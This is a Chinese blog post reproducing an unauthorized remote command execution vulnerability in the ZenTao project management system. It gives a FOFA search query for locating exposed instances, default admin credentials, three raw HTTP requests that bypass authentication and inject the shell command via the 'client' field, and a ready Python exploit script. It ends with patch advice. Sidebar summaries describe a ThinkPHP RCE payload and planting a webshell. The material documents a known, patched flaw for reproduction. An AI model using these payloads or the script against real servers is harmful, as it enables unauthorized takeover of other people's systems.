禅道研发项⽬管理系统未授权RCE漏洞复现

已于 2023-12-08 17:30:36 修改
阅读量821 收藏 3
点赞数 2
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 禅道
于 2023-11-09 17:25:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56698744/article/details/134306157
版权

1、产品介绍

Zendao禅道是第一款国产的开源项目管理软件,他的核心管理思想基于敏捷方法scrum,内置了产品管理和项目管理,同时又根据国内研发现状补充了测试管理、计划管理、发布管理、文档管理、事务管理等功能。

2、漏洞描述

该系统在2023年1月被爆出命令执行漏洞,官方已于2023年1月12日发布了漏洞修复补丁。该漏洞是由于禅道项目管理系统权限认证存在缺陷导致,攻击者可利用该漏洞在未授权的情况下,通过权限绕过在服务器执行任意命令。

影响版本

17.4<= version <=18.0.beta1(开源版)

3.4<= version <=4.0.beta1(旗舰版)

7.4<= version <=8.0.beta1(企业版)

3、fofa 查询语句

fofa:title="用户登录 - 禅道"

4、环境搭建

下载地址:禅道18.0.beta1发布,经典模式全新升级!支持创建项目型项目! - 禅道下载 - 禅道开源项目管理软件

安装包再最下面

建议大家选择Linux系统

tips:如果系统已安装了apache和mysql服务,记得关闭,不然会与一键安装包中的服务冲突

解压

tar -zxvf ZenTaoPMS.18.0.beta1.zbox_64.tar.gz

启动服务

/opt/zbox/zbox start

启动 Apache和Mysql服务后,浏览器直接访问 http://ip

输入禅道默认的管理员账号和密码:admin,123456

5、漏洞复现

首先,用burp抓包,携带有效cookie创建代码仓库

第一段poc

GET /misc-captcha-user.html HTTP/1.1
Accept-Language: zh-CN,zh;q=0.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: text/html;charset=UTF-8
Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
Host: xxx.xxx.xxx.xxx
Connection: close

第二段poc 

POST /repo-create.html HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
Accept-Language: zh-CN,zh;q=0.9
X-Requested-With: XMLHttpRequest
Referer: http://xxx.xxx.xxx/repo-edit-1-0.html
Host: xxx.xxx.xx.xx
Content-Length: 111
Expect: 100-continue
Connection: close

product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=

 tips:我这里这个图是有问题的 

发送如下请求,如果存在漏洞,则返回包中会包含命令执行的结果,如执行‘id’命令

POST /repo-edit-10000-10000.html HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default
Accept-Language: zh-CN,zh;q=0.9
X-Requested-With: XMLHttpRequest
Referer: http://xxxx.xxxx.xxxx/repo-edit-1-0.html
Host: xxxx.xxxx.xxxx
Content-Length: 26
Expect: 100-continue
Connection: close

SCM=Subversion&client=`id`

6、EXP

最后不知道哪位大佬的exp,特别好用!!!

# -*- coding: UTF-8 -*-
# !/usr/bin/python
 
'''
权限绕过+RCE POC 伪静态传参版
禅道系统 影响版本 安全版本
开源版 17.4以下的未知版本<=version<=18.0.beta1 18.0.beta2
旗舰版 3.4以下的未知版本<=version<=4.0.beta1 4.0.beta2
企业版 7.4以下的未知版本<=version<=8.0.beta1 8.0.beta2
'''
import requests
 
proxies = {
    #"http": "127.0.0.1:8080",
    #"https": "127.0.0.1:8080",
}
def check(url):
    url1 = url+'/misc-captcha-user.html'
    # url1 = url+'/index.php?m=misc&f=captcha&sessionVar=user'#非伪静态版本按照此格式传参
    # url2 = url+'/index.php?m=block&f=printBlock&id=1&module=my'#可判断验证绕过的链接
    url3 = url + 'repo-create.html'
    url4 = url + 'repo-edit-10000-10000.html'
    headers={
        "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
        "Accept-Language":"zh-CN,zh;q=0.9",
        "Cookie":"zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
    }
 
    headers2 = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Cookie": "zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
        "Content-Type":"application/x-www-form-urlencoded",
        "X-Requested-With":"XMLHttpRequest",
        "Referer":url+"/repo-edit-1-0.html"
    }
 
    data1 = 'product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid='
    data2 = 'SCM=Subversion&client=`id`'
    s=requests.session()
    try:
        req1 = s.get(url1,proxies=proxies,timeout=5,verify=False,headers=headers)
        req3 = s.post(url3,data=data1,proxies=proxies,timeout=5,verify=False,headers=headers2)
        req4 = s.post(url4,data=data2,proxies=proxies,timeout=5,verify=False,headers=headers2)
        if 'uid=' in req4.text:
            print(url,"")
            return True
    except Exception as e:
        print(e)
    return False
if __name__ == '__main__':
    print(check("http://x.x.x.x/zentao/"))

6、修复建议

1、升级版本

目前禅道官方已正式发布修复版本,建议受影响用户尽快升级至安全版本。

2、临时措施

如不能升级,可在module/common/model.php文件中的echo $endResponseException->getContent();后面加上exit(); 来修复权限绕过漏洞。

故事讲予风听
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞复现】金蝶 EAS createdatasource jndi 远程代码执行漏洞
qq_67810151的博客
04-03 136
金蝶 EAS 存在JNDI注入漏洞授权的攻击者可以通过该漏洞进行远程代码执行,导致服务器被控制。
禅道管理系统RCE漏洞复现+利用
热门推荐
0xSec
02-01 1万+
2023年1月6日,互联网披露其旧版本中存在权限绕过与命令执行漏洞,攻击者可在无需登录的情况下构造恶意请求执行任意命令,控制服务器。
禅道管理系统身份认证绕过漏洞
huangyongkang666的博客
04-27 1273
禅道目管理软件是国产的开源目管理软件,专注研发目管理,内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,完整覆盖了研发目管理的核心流程。禅道管理系统存在身份认证绕过漏洞,远程攻击者利用该漏洞可以绕过身份认证,调用任意API接口并修改管理员用户的密码,并以管理员用户登录该系统,配合其他漏洞进一步利用后,可以实现完全接管服务器16.x
禅道管理系统存在远程命令执行漏洞RCE
nnn2188185的博客
04-14 2968
禅道是第一款国产的开源目管理软件,也是国内最流行的目管理软件。该系统在2023年初被爆出在野命令执行漏洞,官方已于2023年1月12日发布了漏洞修复补丁。该漏洞是由于禅道管理系统权限认证存在缺陷导致,攻击者可利用该漏洞授权的情况下,通过权限绕过在服务器执行任意命令。
禅道后台命令执行漏洞 (二)
蚁景网安学院
08-28 428
漏洞简介禅道是第一款国产的开源目管理软件。它集产品管理、目管理、质量管理、文档管理、 组织管理和事务管理于一体,是一款专业的研发目管理软件,完整地覆盖了目管理的核心流程。禅道管理思想注重实效,功能完备丰富,操作简洁高效,界面美观大方,搜索功能强大,统计报表丰富多样,软件架构合理,扩展灵活,有完善的 API 可以调用。禅道后台存在 RCE 漏洞,存在于 V18.0-18.3 之间,经过复现分...
禅道系统权限绕过与命令执行漏洞分析
C20220511的博客
03-09 1859
权限绕过的关键点在module/common/model.php文件中checkPriv函数,此函数是检查权限的函数,验证当前登陆用户是否有访问module与method的权限。经过代码审计发现captcha函数可以直接写入一个自定义key的session,此段代码本意是设置生成一个自定义session的key的验证码,开发者应该是想写一个公共的验证码生成函数让其他开发者做新功能需要的时候可以直接调用,正好可以利用生成一个key为user的session。后面加上exit();来修复权限绕过漏洞
禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记
weixin_30781567的博客
05-17 845
禅道全版本rce漏洞复现笔记漏洞说明禅道目管理软件是一款国产的,基于LGPL协议,开源免费的目管理软件,它集产品管理、目管理、测试管理于一体,同时还包含了事务管理、组织管理等诸多功能,是中小型企业目管理的首选,基于自主的PHP开发框架──ZenTaoPHP而成,第三方开发者或企业可非常方便的开发插件或者进行定制。此次发现的漏洞正是ZenTaoPHP框架中的通用代码所造成的的,因此禅道几乎所...
漏洞复现】利用禅道系统RCE命令执行漏洞反弹shell
刘家华(游戏开发)
04-23 1110
禅道系统RCE漏洞复现
CVE-2021-22192 靶场: 授权用户 RCE 漏洞.zip
01-16
在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8262
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
渗透测试之Web安全系列教程(一)
最新发布
fearhacker的专栏
06-02 844
script 标签 的 src 属性,指向跨域脚本的URL地址!如果客户端,是我们自己编制的浏览器,或者是自己编制的可以解析网页内容的脚本,那么,我们是可以突破同源策略限制的!由于 浏览器的同源策略,并没有对 script 等标签进行同源限制,这导致了 恶意黑客 可以利用这一特性,并通过一些 Web 网站中所存在的XSS注入漏洞,将一些恶意的代码(包含 script 相关内容,而 script 的 src 属性的值,可能是指向某个其它域的、包含木马脚本的URL地址)内容嵌入到 Web 网站的指定页面中。
网络安全VIP>第一篇《工业互联网安全
Else 的博客
05-28 985
工业互联网的网络是基础,平台是核心,安全是保障。信息化会提高工业化的生产效率,但信息化本身具备两面性。一方面它可以让信息交互更加顺畅,共享更加快捷;但另一方面是带来相应的安全威胁。
深入解析网络流量监控分析系统:保障网络安全的关键
Johnstons的博客
05-29 928
网络流量监控分析系统是一种用于实时监控、分析和报告网络数据流量的工具。它能够帮助网络管理员了解网络使用情况、发现潜在问题、优化网络性能,并保障网络安全。通过监控网络流量,管理员可以识别异常活动,如网络攻击、数据泄露或授权访问,从而及时采取措施应对。
Web安全:文件上传漏洞详解,文件上传漏洞原理、绕过方式和防御方案。
wangyuxiang946的博客
05-28 1982
结合实战靶场解析文件上传漏洞过滤及绕过方式,讲解文件上传原理和防御方式,
Linux防火墙(以iptables为例)
Tassel_YUE的博客
05-28 1098
防火墙是一种网络安全设备,用于监视和控制网络数据流量。其主要功能是在不同网络之间建立一条阻隔,对进出的数据流量进行过滤和筛选,从而保护内部网络免受授权的访问和恶意攻击。防火墙通过规则集合控制网络流量的通过与阻止,这些规则可以根据网络策略和需求进行配置。不正确的配置可能导致无法访问特定服务或应用程序。
CTF网络安全大赛简单的web抓包题目:HEADache
Pythonit教程网
05-20 1187
题目 描  述: > Wanna learn about some types of headache?红客网:blog.hongkewang.cn。”,就能获取到flag,完成题目了。直接在抓包到的页面添加请求头“题目来源于:bugku。
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

故事讲予风听

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值